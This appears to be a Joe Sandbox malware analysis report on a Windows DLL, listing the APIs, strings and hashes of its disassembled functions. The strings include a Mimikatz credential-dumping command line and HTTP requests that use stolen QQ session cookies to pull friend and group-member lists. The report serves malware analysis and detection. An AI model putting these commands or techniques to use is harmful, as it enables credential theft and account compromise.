                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #800$#858$#3811$#540$#922$#2770#2781#3181#3324#4058#537Message$#1980#2614#3010#3178#3304#3310#356#4215#535#668#6883#860#940#941
                                                  • String ID: *.*$warning
                                                  • API String ID: 3130606840-3923866357
                                                  • Opcode ID: 251ad2f11a4f3d366ba395f991fd5f89db86f2f297839ac524b49303de88fe60
                                                  • Instruction ID: b1e61bf16f4b2c14380c5a5ce74a3a62fa832d31a0b46feb69f6aa117d284303
                                                  • Opcode Fuzzy Hash: 251ad2f11a4f3d366ba395f991fd5f89db86f2f297839ac524b49303de88fe60
                                                  • Instruction Fuzzy Hash: 42027F745083858BD354CF64C941FABBBE5FF98684F40492CF9DA43296EB34E909CB62
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$Eventfreemalloc
                                                  • String ID: .$0$2$3$A$A$C$D$G$K$L$N$P$P$R$S$T$W$\$a$a$a$c$d$f$h$i$l$l$l$m$n$o$p$t$t$t$t$t$u
                                                  • API String ID: 4197004350-898277365
                                                  • Opcode ID: e985835fed67615f6df0a7680aadc73079c05cb754b57abcd28cffc8d42705bc
                                                  • Instruction ID: e4e1a8f70a62ed0fb3f70fb2bb34216420262f45e8a5f1963d3a2823f94517be
                                                  • Opcode Fuzzy Hash: e985835fed67615f6df0a7680aadc73079c05cb754b57abcd28cffc8d42705bc
                                                  • Instruction Fuzzy Hash: A4615A6110C3C09DE312D7A89848B8BBFD59BE6308F08499DF5C84B292D2BA921CC777
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32 ref: 10021B6B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021B78
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,TerminateThread), ref: 10021B8C
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021B8F
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,?), ref: 10021BDB
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021BDE
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,esolC), ref: 10021C52
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021C55
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,TerminateProcess), ref: 10021C65
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021C68
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,DisconnectNamedPipe), ref: 10021C78
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021C7B
                                                  • Sleep.KERNEL32(0000000A), ref: 10021C92
                                                  • GetConsoleProcessList.KERNEL32(?,00000001), ref: 10021CB2
                                                  • #823.MFC42 ref: 10021CC3
                                                  • GetConsoleProcessList.KERNEL32(00000000,00000000), ref: 10021CD3
                                                  • GetCurrentProcessId.KERNEL32 ref: 10021CE7
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 10021CFE
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 10021D09
                                                  • CloseHandle.KERNEL32(00000000), ref: 10021D10
                                                  • #825.MFC42(00000000), ref: 10021D29
                                                  • FreeConsole.KERNEL32 ref: 10021D3B
                                                  • Sleep.KERNEL32(0000000A), ref: 10021D43
                                                  • FreeConsole.KERNEL32 ref: 10021D49
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoadProcess$Console$FreeHandleListSleep$#823#825CloseCurrentModuleOpenTerminate
                                                  • String ID: AttachConsole$C$DisconnectNamedPipe$F$KERNEL32.dll$S$TerminateProcess$TerminateThread$W$a$c$e$e$elgn$esolC$g$l$l$l$n$o$o$r$s
                                                  • API String ID: 708691324-3966567685
                                                  • Opcode ID: 741715f5c22d509939c9bc528903dab9d2a512ea46f4c08bb4bf823d40ea4759
                                                  • Instruction ID: c933f3f563454645004e4f6d5f6eb1a79af4ddca9388bdfc54bceab6f739e533
                                                  • Opcode Fuzzy Hash: 741715f5c22d509939c9bc528903dab9d2a512ea46f4c08bb4bf823d40ea4759
                                                  • Instruction Fuzzy Hash: 6BB1B0746083949BDB20DB68CC84BDFBBE9AF95740F45481DF9889B241C7B5E904CBA2
                                                  APIs
                                                  • strstr.MSVCRT ref: 10013514
                                                  • strstr.MSVCRT ref: 10013527
                                                  • strstr.MSVCRT ref: 1001353C
                                                  • strncpy.MSVCRT ref: 10013588
                                                  • _itoa.MSVCRT ref: 100135CE
                                                  • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 100135E7
                                                  • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1001360D
                                                  • InternetCloseHandle.WININET(00000000), ref: 1001361A
                                                  • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,80084010,00000000), ref: 1001364A
                                                  • InternetCloseHandle.WININET(00000000), ref: 1001365D
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013660
                                                  • sprintf.MSVCRT ref: 1001368B
                                                  • HttpSendRequestA.WININET(00000000,?,?,?), ref: 100136C3
                                                  • HttpQueryInfoA.WININET(00000000,00000005,?,?,00000000), ref: 100136DF
                                                  • InternetCloseHandle.WININET(00000000), ref: 100136F0
                                                  • InternetCloseHandle.WININET(00000000), ref: 100136F3
                                                  • InternetCloseHandle.WININET(00000000), ref: 100136F6
                                                  • atol.MSVCRT ref: 1001370F
                                                  • #823.MFC42(00000001,?,?), ref: 1001371D
                                                  • InternetReadFile.WININET(00000000,00000000,00000001,?), ref: 10013745
                                                  • #825.MFC42(00000000), ref: 10013750
                                                  • InternetCloseHandle.WININET(00000000), ref: 1001375F
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013762
                                                  • InternetCloseHandle.WININET(?), ref: 10013769
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013781
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013784
                                                  • InternetCloseHandle.WININET(?), ref: 1001378B
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 1001379B
                                                  • #823.MFC42(00000002), ref: 100137A8
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 100137D2
                                                  • #825.MFC42(00000000), ref: 100137D9
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 100137F0
                                                  • #823.MFC42(00000001), ref: 100137FC
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 10013827
                                                  • #825.MFC42(00000000), ref: 1001382E
                                                  • #825.MFC42(00000000,00000000,00000000), ref: 1001383C
                                                  Strings
                                                  • qun.qq.com, xrefs: 100134BB
                                                  • , xrefs: 10013503
                                                  • bkn=, xrefs: 1001354D
                                                  • Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s, xrefs: 10013685
                                                  • p_skey, xrefs: 100134FD
                                                  • skey=, xrefs: 10013521
                                                  • /cgi-bin/qun_mgr/get_friend_list, xrefs: 100134DB
                                                  • POST, xrefs: 10013644
                                                  • Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1), xrefs: 100134AF
                                                  • HTTP/1.1, xrefs: 1001363E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandle$#825ByteCharMultiWide$#823Httpstrstr$OpenRequest$ConnectFileInfoQueryReadSend_itoaatolsprintfstrncpy
                                                  • String ID: $/cgi-bin/qun_mgr/get_friend_list$Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s$HTTP/1.1$Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)$POST$bkn=$p_skey$qun.qq.com$skey=
                                                  • API String ID: 3684279964-1003693118
                                                  • Opcode ID: 83a2f2817c2aedd7fbe9857ede55100449b32c6472bc6b786a787f71fcc3d649
                                                  • Instruction ID: a6aeb5833008578cdead13e838f5760d2c554c937ea3091131f56ecc18512e5b
                                                  • Opcode Fuzzy Hash: 83a2f2817c2aedd7fbe9857ede55100449b32c6472bc6b786a787f71fcc3d649
                                                  • Instruction Fuzzy Hash: 4FA137726003146BE314DA788C41FAB7BDDFBC4320F044629FA59E72C0DEB4A9058B95
                                                  APIs
                                                    • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,755683C0,1001F1D6), ref: 1001B666
                                                    • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                    • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                  • DeleteFileA.KERNEL32(00000001,?,00000001,00000001,?,00000001,00000001,00000001), ref: 1000874C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressDeleteFileHandleLibraryLoadModuleProc
                                                  • String ID: .$2$3$4$4$6$6$E$E$F$K$L$N$R$R$R$R$W$W$a$c$d$d$i$i$i$l$l$n$n$o$o$o$open$r$r$r$s$t$t$v$w$w
                                                  • API String ID: 357481036-173339048
                                                  • Opcode ID: b35eb0abf191cff89a94c78c48ed883a63f7157c3257380d681e420933c49f90
                                                  • Instruction ID: b2534d6be5788ef259c749724872d3f87395c9b78c17d96c33da540c7ee2e7e0
                                                  • Opcode Fuzzy Hash: b35eb0abf191cff89a94c78c48ed883a63f7157c3257380d681e420933c49f90
                                                  • Instruction Fuzzy Hash: 5B91291010C3C0D9E356C668848871FBED6ABA668CF48598DB1C95B287C6BF961CC77B
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(KERNEL32.dll,AttachConsole), ref: 10022086
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10022093
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,WriteFile), ref: 100220A1
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100220A8
                                                  • Sleep.KERNEL32(0000000A), ref: 100220F7
                                                  • GetConsoleProcessList.KERNEL32(?,00000001), ref: 10022117
                                                  • #823.MFC42 ref: 1002212C
                                                  • GetConsoleProcessList.KERNEL32(00000000,00000000), ref: 1002213C
                                                  • GetCurrentProcessId.KERNEL32 ref: 1002215C
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 10022173
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 10022182
                                                  • CloseHandle.KERNEL32(00000000), ref: 10022185
                                                  • #825.MFC42(00000000), ref: 100221B0
                                                  • FreeConsole.KERNEL32 ref: 100221BE
                                                  • Sleep.KERNEL32(0000000A), ref: 100221C6
                                                  • FreeConsole.KERNEL32 ref: 100221CC
                                                    • Part of subcall function 10010BA0: SetEvent.KERNEL32(?,10017547), ref: 10010BA4
                                                  • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 1002233F
                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 10022383
                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 100223A7
                                                  • CloseHandle.KERNEL32(00000000), ref: 100223B2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$Console$Handle$AddressCloseFileFreeListProcSleep$#823#825CreateCurrentDirectoryEventLibraryLoadModuleOpenSystemTerminateWrite
                                                  • String ID: AttachConsole$Control-C^C$GetMP privilege::debug sekurlsa::logonpasswords exit$KERNEL32.dll$WriteFile$\GetMP.exe
                                                  • API String ID: 1461520672-3309419308
                                                  • Opcode ID: 6310b5d375ddeb1e15972f7a9968cdf70d34c61dddc8e7a1745c458d66823d98
                                                  • Instruction ID: 745433b2e33f40d27a107189e57a56e7013cf6ba6b9ad028cc8163822ca25403
                                                  • Opcode Fuzzy Hash: 6310b5d375ddeb1e15972f7a9968cdf70d34c61dddc8e7a1745c458d66823d98
                                                  • Instruction Fuzzy Hash: 05A12675600315ABE710EB64DC81FDB77D4FB84390F450A29FE49AB280DA35EC49CBA2
                                                  APIs
                                                  • InternetOpenA.WININET ref: 100138CF
                                                  • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 100138F5
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013902
                                                  • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,80084010,00000000), ref: 10013932
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013945
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013948
                                                  Strings
                                                  • qun.qq.com, xrefs: 10013878
                                                  • /cgi-bin/qun_mgr/search_group_members, xrefs: 10013898
                                                  • , xrefs: 100138BC
                                                  • Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s, xrefs: 1001396D
                                                  • POST, xrefs: 1001392C
                                                  • Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1), xrefs: 1001386F
                                                  • HTTP/1.1, xrefs: 10013926
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandle$Open$ConnectHttpRequest
                                                  • String ID: $/cgi-bin/qun_mgr/search_group_members$Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s$HTTP/1.1$Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)$POST$qun.qq.com
                                                  • API String ID: 3078302290-2376693140
                                                  • Opcode ID: 492e52c6053871d090237183561d3215cecf92edc6964bc9b14581eaf8abf60b
                                                  • Instruction ID: ea8ef1183b0b68027489ada680c689866708b7ee025198ed557c1e0327d219cf
                                                  • Opcode Fuzzy Hash: 492e52c6053871d090237183561d3215cecf92edc6964bc9b14581eaf8abf60b
                                                  • Instruction Fuzzy Hash: 197119366447147BF310EB689C45FAB77DDFB84720F184629F749A72C0DAB4A9048BA2
                                                  APIs
                                                  • LoadLibraryA.KERNEL32 ref: 1002C1EF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002C1F8
                                                  • LoadLibraryA.KERNEL32(wininet.dll,InternetCloseHandle), ref: 1002C226
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002C229
                                                  • LoadLibraryA.KERNEL32(wininet.dll,InternetOpenUrlA), ref: 1002C239
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002C23C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: $($)$.$/$0$4$CreateFileA$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$KERNEL32.dll$M$WININET.dll$b$c$e$m$o$o$p$t$wininet.dll$z
                                                  • API String ID: 2574300362-3884860928
                                                  • Opcode ID: 2c8e0b5f39f58fa8b784c09551921f0494a88c72919cc9d60d4391f1f8b674ac
                                                  • Instruction ID: 372516e92528e6efe9f22b4c5a5c646a96e954f55364d348ea2945ce99da904a
                                                  • Opcode Fuzzy Hash: 2c8e0b5f39f58fa8b784c09551921f0494a88c72919cc9d60d4391f1f8b674ac
                                                  • Instruction Fuzzy Hash: 2551817110C3C4AEE311DBA89C84B9FBFD99BD5248F944A1DF28867242C679D6088767
                                                  APIs
                                                    • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,755683C0,1001F1D6), ref: 1001B666
                                                    • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                    • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                  • GetVersionExA.KERNEL32(?), ref: 1001DF7B
                                                    • Part of subcall function 1001AC50: LoadLibraryW.KERNEL32(ntdll.dll,?,00000000,1001B2AF,?,?,?), ref: 1001AC59
                                                    • Part of subcall function 1001AC50: GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 1001AC6B
                                                    • Part of subcall function 1001AC50: FreeLibrary.KERNEL32(00000000), ref: 1001AC95
                                                  • ExitProcess.KERNEL32 ref: 1001E015
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: same nine module dumps as listed for the previous function (identical for every function in this module)
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressLoadProc$ExitFreeHandleModuleProcessVersion
                                                  • String ID: .$.$2$2$3$3$D$I$L$P$S$S$S$S$V$a$c$d$d$e$e$e$e$e$i$l$l$l$l$n$r$s$u$v$v
                                                  • API String ID: 1234256494-3470857448
                                                  • Opcode ID: a7b4af1af0eac9efd19d3b616aa3e6d89de6f990af98c94fa3adef2c9044e506
                                                  • Instruction ID: f4702430a3c5328c5ff3dd9a0e4adc3db862c49a5761f8788f093bcad00a8dc9
                                                  • Opcode Fuzzy Hash: a7b4af1af0eac9efd19d3b616aa3e6d89de6f990af98c94fa3adef2c9044e506
                                                  • Instruction Fuzzy Hash: 59512C2140C3C0DDE312D7688898B5FBFE55BA6748F48499EF1C94A282C2BAC65CC777
                                                  APIs
                                                  • AttachConsole.KERNEL32(?), ref: 1000FEF3
                                                  • Sleep.KERNEL32(0000000A), ref: 1000FEFB
                                                  • AttachConsole.KERNEL32(?), ref: 1000FF05
                                                  • GetConsoleProcessList.KERNEL32(?,00000001), ref: 1000FF18
                                                  • #823.MFC42(00000000), ref: 1000FF29
                                                  • GetConsoleProcessList.KERNEL32(00000000,00000000), ref: 1000FF39
                                                  • GetCurrentProcessId.KERNEL32 ref: 1000FF43
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 1000FF57
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 1000FF66
                                                  • CloseHandle.KERNEL32(00000000), ref: 1000FF6D
                                                  • #825.MFC42(00000000), ref: 1000FF7E
                                                  • FreeConsole.KERNEL32 ref: 1000FF8C
                                                  • Sleep.KERNEL32(0000000A), ref: 1000FF94
                                                  • FreeConsole.KERNEL32 ref: 1000FF9A
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 1000FFA6
                                                  • CloseHandle.KERNEL32(?), ref: 10010006
                                                  • CloseHandle.KERNEL32(?), ref: 1001000E
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00020000), ref: 1001002F
                                                  • OpenServiceA.ADVAPI32(00000000,1011EC82,00000010), ref: 10010043
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 10010050
                                                  • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 10010066
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 10010077
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 1001007A
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 10010087
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 1001008A
                                                  • GetCommandLineA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 100100C8
                                                  • CreateProcessA.KERNEL32(00000000,00000000), ref: 100100D1
                                                  • CloseHandle.KERNEL32(?), ref: 100100E4
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 100100FB
                                                  • CreateProcessA.KERNEL32 ref: 1001016C
                                                  • CloseHandle.KERNEL32(?), ref: 1001017F
                                                  • CloseHandle.KERNEL32(?), ref: 10010186
                                                  • ExitProcess.KERNEL32 ref: 1001018A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: same nine module dumps as listed for the previous function (identical for every function in this module)
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$Process$Service$Console$Open$AttachCreateFreeListSleepTerminate$#823#825CommandCurrentExitFileLineManagerModuleNameStart
                                                  • String ID: -inst$D$D
                                                  • API String ID: 2444995177-2453324352
                                                  • Opcode ID: 5c0f68580dd309453bc8097f2966c259f4ab4ec395cbcbb89f8d73f666c2bb2e
                                                  • Instruction ID: 81ebdc164915bba45ce875e3ab3855c87f442e81fe63613658d6256ab5c1e20f
                                                  • Opcode Fuzzy Hash: 5c0f68580dd309453bc8097f2966c259f4ab4ec395cbcbb89f8d73f666c2bb2e
                                                  • Instruction Fuzzy Hash: E081D231600316ABE700DB64CC80B7B77E9FF88790F054A2DFA4997694DB74EC008BA5
                                                  APIs
                                                  • #535.MFC42(00000030,00000002,00000000,?,00000000), ref: 10011B2F
                                                  • #540.MFC42 ref: 10011B40
                                                  • #540.MFC42 ref: 10011B4E
                                                  • #6282.MFC42 ref: 10011B69
                                                  • #6283.MFC42 ref: 10011B72
                                                  • #941.MFC42(100FA644), ref: 10011B80
                                                  • #2784.MFC42(100FB4F0,100FA644), ref: 10011B8E
                                                  • #6662.MFC42(00000022,00000001,100FB4F0,100FA644), ref: 10011BB7
